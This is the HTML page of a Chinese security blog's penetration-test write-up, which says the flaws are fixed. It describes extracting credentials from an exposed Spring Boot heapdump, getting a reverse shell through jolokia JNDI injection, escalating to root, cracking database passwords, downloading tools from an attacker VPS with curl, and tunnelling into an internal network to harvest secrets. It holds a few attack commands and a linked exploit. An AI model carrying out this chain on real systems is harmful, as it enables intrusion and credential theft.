<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="漏洞截止目前已完全修复。  1.思路1heapdump信息泄露-弱口令-RCE-数据库-后台弱口令-内网系统弱口令-敏感信息挖掘 2.Heapdump信息泄露Springboot搭建的系统，首先访问Actuator模块，看有哪些端点暴露，最常见的就是env、info、metrics等等，最喜人乐见的就是heapdump、gateway、jolokia等，前者可能导致轻微信息泄露、而后者可能导致敏">
<meta property="og:type" content="article">
<meta property="og:title" content="记一次RCE+heapdump信息泄露引发的血案">
<meta property="og:url" content="https://huclilu.github.io/posts/37ae6fbb/index.html">
<meta property="og:site_name" content="li1u|安全之道、就在其中">
<meta property="og:description" content="漏洞截止目前已完全修复。  1.思路1heapdump信息泄露-弱口令-RCE-数据库-后台弱口令-内网系统弱口令-敏感信息挖掘 2.Heapdump信息泄露Springboot搭建的系统，首先访问Actuator模块，看有哪些端点暴露，最常见的就是env、info、metrics等等，最喜人乐见的就是heapdump、gateway、jolokia等，前者可能导致轻微信息泄露、而后者可能导致敏">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329211622655.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329213702034.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329213853806.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329213936250.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329214026991.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329214141373.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329215501444.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230140643.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230121901.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230259448.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326233016834.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326233249770.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330000916557.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230445077.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230516567.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230553032.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330001436993.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330001622770.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330001654028.png">
<meta property="og:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330002035412.png">
<meta property="article:published_time" content="2023-03-29T12:38:34.000Z">
<meta property="article:modified_time" content="2023-03-29T16:38:48.890Z">
<meta property="article:author" content="li1u">
<meta property="article:tag" content="漏洞挖掘">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329211622655.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    
      <title>记一次RCE+heapdump信息泄露引发的血案</title>
    
    
    <!-- styles -->

    <!-- 默认CSS引入方法 -->
    
<link rel="stylesheet" href="/css/whiteStyle.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	


  
  <!-- L2Dwidget -->
  
<script src="/lib/live2d/L2Dwidget.min.js"></script>


  <script>
  // 猫
  L2Dwidget.init({
    model: {
      jsonPath: "/lib/live2d/tororo/assets/tororo.model.json",
    },
    display: {
      superSample: 2,
      width: 60,
      height: 80,
      position: 'right',
      hOffset: 0,
      vOffset: 20,
    },
    mobile: {
      show: true,
      scale: 1,
      motion: true,
    },
    react: {
      opacityDefault: 1,
      opacityOnHover: 1,
    }
  })
  </script>
<meta name="generator" content="Hexo 6.2.0"></head>

<body class="max-width mx-auto px3 lte">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"
    style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        
          <li><a href="/">
              首页
            </a></li>
          
          <li><a href="/about/">
              关于
            </a></li>
          
          <li><a href="/archives/">
              归档
            </a></li>
          
          <li><a href="/search/">
              搜索
            </a></li>
          
      </ul>
    </span>
    <br />
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%80%9D%E8%B7%AF"><span class="toc-number">1.</span> <span class="toc-text">1.思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-Heapdump%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">2.</span> <span class="toc-text">2.Heapdump信息泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-jolokia%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%88CVE-2018-1000130%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">3.jolokia命令执行（CVE-2018-1000130）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E7%99%BB%E9%99%86%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-number">4.</span> <span class="toc-text">4.登陆数据库</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-NPC%E8%90%BD%E5%9C%B0%E8%BF%9B%E5%86%85%E7%BD%91"><span class="toc-number">5.</span> <span class="toc-text">5.NPC落地进内网</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">6.</span> <span class="toc-text">6.敏感信息泄露</span></a></li></ol>
    </div>
    <br />
    <span id="actions">
      <ul>
        
            
              <li><a class="icon" aria-label="下一篇 " href="/posts/cf29e875/"><i
                    class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();"
                    onmouseout="$('#i-next').toggle();"></i></a></li>
              
                <li><a class="icon" aria-label="返回顶部 " href="#"
                    onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up"
                      aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a>
                </li>
                <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt"
                      aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();"
                      onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">
        上一篇
      </span>
      <span id="i-next" class="info" style="display:none;">
        下一篇
      </span>
      <span id="i-top" class="info" style="display:none;">
        返回顶部
      </span>
      <span id="i-share" class="info" style="display:none;">
        分享文章
      </span>
    </span>
    <br />
    <div id="share" style="display: none">
      <ul>
  <li> 开发中. </li>
  <!-- <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://huclilu.github.io/posts/37ae6fbb/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://huclilu.github.io/posts/37ae6fbb/&text=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://huclilu.github.io/posts/37ae6fbb/&is_video=false&description=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=记一次RCE+heapdump信息泄露引发的血案&body=Check out this article: https://huclilu.github.io/posts/37ae6fbb/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://huclilu.github.io/posts/37ae6fbb/&name=记一次RCE+heapdump信息泄露引发的血案&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://huclilu.github.io/posts/37ae6fbb/&t=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li> -->

</ul>

    </div>

  </span>
</div>
    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        记一次RCE+heapdump信息泄露引发的血案
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">li1u</span>
      </span>
      <!-- 文章时间和首页时间 -->

    <div class="postdate">
      
        <time datetime="2023-03-29T12:38:34.000Z" itemprop="datePublished">2023-03-29</time>
        
        (Updated: <time datetime="2023-03-29T16:38:48.890Z" itemprop="dateModified">2023-03-30</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" rel="tag">漏洞挖掘</a>
    </div>


    </div>
  </header>
  

  <div class="content conterDiy" itemprop="articleBody">
    <blockquote>
<p>漏洞截止目前已完全修复。</p>
</blockquote>
<h2 id="1-思路"><a href="#1-思路" class="headerlink" title="1.思路"></a>1.思路</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">heapdump信息泄露-弱口令-RCE-数据库-后台弱口令-内网系统弱口令-敏感信息挖掘</span><br></pre></td></tr></table></figure>
<h2 id="2-Heapdump信息泄露"><a href="#2-Heapdump信息泄露" class="headerlink" title="2.Heapdump信息泄露"></a>2.Heapdump信息泄露</h2><p>Springboot搭建的系统，首先访问Actuator模块，看有哪些端点暴露，最常见的就是env、info、metrics等等，最喜人乐见的就是heapdump、gateway、jolokia等，前者可能导致轻微信息泄露、而后者可能导致敏感信息泄露乃至RCE进内网。</p>
<p>这里需要注意的是，访问Springboot的系统，有时候URL后边直接加actuator提示404并不代表端点没有暴露，可能是文件目录导致的，就比如这次渗透的目标站点就是如此：<a target="_blank" rel="noopener" href="https://target.com:8090/xxx/actuator/">https://target.com:8090/xxx/actuator/</a></p>
<p>访问actuator，查看暴露的端点，发现heapdump文件，直接下载下来打开即可。这里打开heapdump转储文件，打开heapdump的方式有多种，MAT、JDumpSpider-1.0-SNAPSHOT-full.jar、heapdump_tool.jar等等，GitHub也有其它的打开工具，往往一种工具查出来的信息不完整，比如直接用JDumpSpider-1.0-SNAPSHOT-full.jar跑出来的结果可能不全，但是跑出的结果很清晰、heapdump_tool.jar跑出来的结果更全一些，但是结果展示不是很清晰。建议都跑一遍，确保收集信息的广度，这个后边会继续提到</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329211622655.png" alt="image-20230329211622655"></p>
<p>使用JDumpSpider只跑出来了本地数据库账号口令（为后边拿下内网数据库做了铺垫）</p>
<p>继续用heapdump_tool.jar在跑一下</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329213702034.png" alt="image-20230329213702034"></p>
<p>等数据加载完之后，输入关键字进行关键字查询：password、geturl、getfile等，直接输入password搜索password字样</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329213853806.png" alt="image-20230329213853806"></p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329213936250.png" alt="image-20230329213936250"></p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329214026991.png" alt="image-20230329214026991"></p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329214141373.png" alt="image-20230329214141373"></p>
<p>将收集到的密码做成字典，后期可以做爆破口令用，成功登陆外网druid</p>
<h2 id="3-jolokia命令执行（CVE-2018-1000130）"><a href="#3-jolokia命令执行（CVE-2018-1000130）" class="headerlink" title="3.jolokia命令执行（CVE-2018-1000130）"></a>3.jolokia命令执行（CVE-2018-1000130）</h2><p>目标不止有heapdump、还有jolokia端点，jolokia存在RCE漏洞，但是有利用条件（目标JDK版本、是否存在端点以及引用了jolokia-core依赖等）：直接访问&#x2F;jolokia&#x2F;list查看有无type&#x3D;MBeanFactory 和 createJNDIRealm参数可判断是否可能RCE，jolokia&#x2F;list下存在这两个参数，尝试进行jndi注入（GitHub有诸多jndi工具以及利用详情）</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230329215501444.png" alt="image-20230329215501444"></p>
<p>目标有接收请求，貌似也请求了VPS上的class文件，但是反弹shell没反应。大概率是目标主机jdk版本过高导致反弹shell失败，尝试进行高版本jdk进行jndi注入。</p>
<p>提取准备好base64编码之后的反弹shell语句</p>
<p>启动jndi工具</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230140643.png" alt="image-20230326230140643"></p>
<p>这里使用py工具发送payload：</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py">https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py</a></p>
<p>py文件url以及payload修改成jndi工具生成的恶意payload，运行py</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230121901.png" alt="image-20230326230121901"></p>
<p>反弹shell成功，反弹回来的shell很多命令没法用，目标主机存在python环境，使用ptyshell实现简单的tty</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230259448.png" alt="image-20230326230259448"></p>
<p>目标主机ubuntu，sudo su切换到root用户</p>
<h2 id="4-登陆数据库"><a href="#4-登陆数据库" class="headerlink" title="4.登陆数据库"></a>4.登陆数据库</h2><blockquote>
<p>heapdump泄露的数据库账号密码尝试登陆数据库</p>
</blockquote>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326233016834.png" alt="image-20230326233016834"></p>
<p>查找用户名口令：</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326233249770.png" alt="image-20230326233249770"></p>
<p>MD5加密的管理员密码，尝试解密：</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1.png" alt="1"></p>
<p>由于heapdump在管理系统目录下：xxx&#x2F;actuator&#x2F;heapdump，猜测密码大概率是后台管理系统密码</p>
<p>口令登陆成功：涉及信息过于敏感，暂时不放图了</p>
<h2 id="5-NPC落地进内网"><a href="#5-NPC落地进内网" class="headerlink" title="5.NPC落地进内网"></a>5.NPC落地进内网</h2><p>VPS开启python服务，目标主机cd到tmp目录下:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -O http://xxx:8888/kscan</span><br></pre></td></tr></table></figure>

<p>将kscan与npc端下载到目标主机tmp目录下</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330000916557.png" alt="image-20230330000916557"></p>
<p>运行NPC端：</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230445077.png" alt="image-20230326230445077"></p>
<p>主机成功上线：</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230516567.png" alt="image-20230326230516567"></p>
<p>proxifier设置socks5代理尝试连接：</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230326230553032.png" alt="image-20230326230553032"></p>
<p>proxifier添加firefox规则后，根据kscan扫描出的结果尝试访问web服务：</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330001436993.png" alt="image-20230330001436993"></p>
<p>弱口令*1</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330001622770.png" alt="image-20230330001622770"></p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330001654028.png" alt="image-20230330001654028"></p>
<p>尝试使用数据库中存储的密码挨个进行登陆~</p>
<h2 id="6-敏感信息泄露"><a href="#6-敏感信息泄露" class="headerlink" title="6.敏感信息泄露"></a>6.敏感信息泄露</h2><p>查找系统中propertie配置文件，获取多个appkey和secret信息</p>
<p><img src="https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/image-20230330002035412.png" alt="image-20230330002035412"></p>
<p>较为敏感的信息就不在放出了</p>
<p>主要高版本jdk的jndi注入以及信息收集（收集密码做字典定向爆破）的结果，才使得进入内网之后可以拿下多个后台管理系统，从而获取大量敏感信息。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" class="Popup" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer"  class="Popup" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%80%9D%E8%B7%AF"><span class="toc-number">1.</span> <span class="toc-text">1.思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-Heapdump%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">2.</span> <span class="toc-text">2.Heapdump信息泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-jolokia%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%88CVE-2018-1000130%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">3.jolokia命令执行（CVE-2018-1000130）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E7%99%BB%E9%99%86%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-number">4.</span> <span class="toc-text">4.登陆数据库</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-NPC%E8%90%BD%E5%9C%B0%E8%BF%9B%E5%86%85%E7%BD%91"><span class="toc-number">5.</span> <span class="toc-text">5.NPC落地进内网</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">6.</span> <span class="toc-text">6.敏感信息泄露</span></a></li></ol>
    </div>

    <div id="share-footer"  class="Popup" style="display: none">
      <ul>
  <li> 开发中. </li>
  <!-- <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://huclilu.github.io/posts/37ae6fbb/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://huclilu.github.io/posts/37ae6fbb/&text=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://huclilu.github.io/posts/37ae6fbb/&is_video=false&description=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=记一次RCE+heapdump信息泄露引发的血案&body=Check out this article: https://huclilu.github.io/posts/37ae6fbb/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://huclilu.github.io/posts/37ae6fbb/&title=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://huclilu.github.io/posts/37ae6fbb/&name=记一次RCE+heapdump信息泄露引发的血案&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://huclilu.github.io/posts/37ae6fbb/&t=记一次RCE+heapdump信息泄露引发的血案"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li> -->

</ul>

    </div>

   

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2023
    li1u
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->


 
  <link
    rel="preload"
    href="/lib/font-awesome/css/all.min.css"
    as="style"
    onload="this.onload=null;this.rel='stylesheet'"
  />
  <noscript
    ><link
      rel="stylesheet"
      href="/lib/font-awesome/css/all.min.css"
  /></noscript>


    <!-- jquery -->
 
  
<script src="/lib/jquery/jquery.min.js"></script>





<!-- clipboard -->

   
    
<script src="/lib/clipboard/clipboard.min.js"></script>

  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
    console.log('1')
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
      setTimeout(()=>{
        e.trigger.setAttribute('aria-label', "复制到粘贴板!");
      },1500)
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


    <div class="img-pup" style="display: none;"> 
      <img>
    </div>
<!-- 雪花特效2 -->

  <script type="text/javascript" src="/js/snow.js"></script>

</body>
</html>
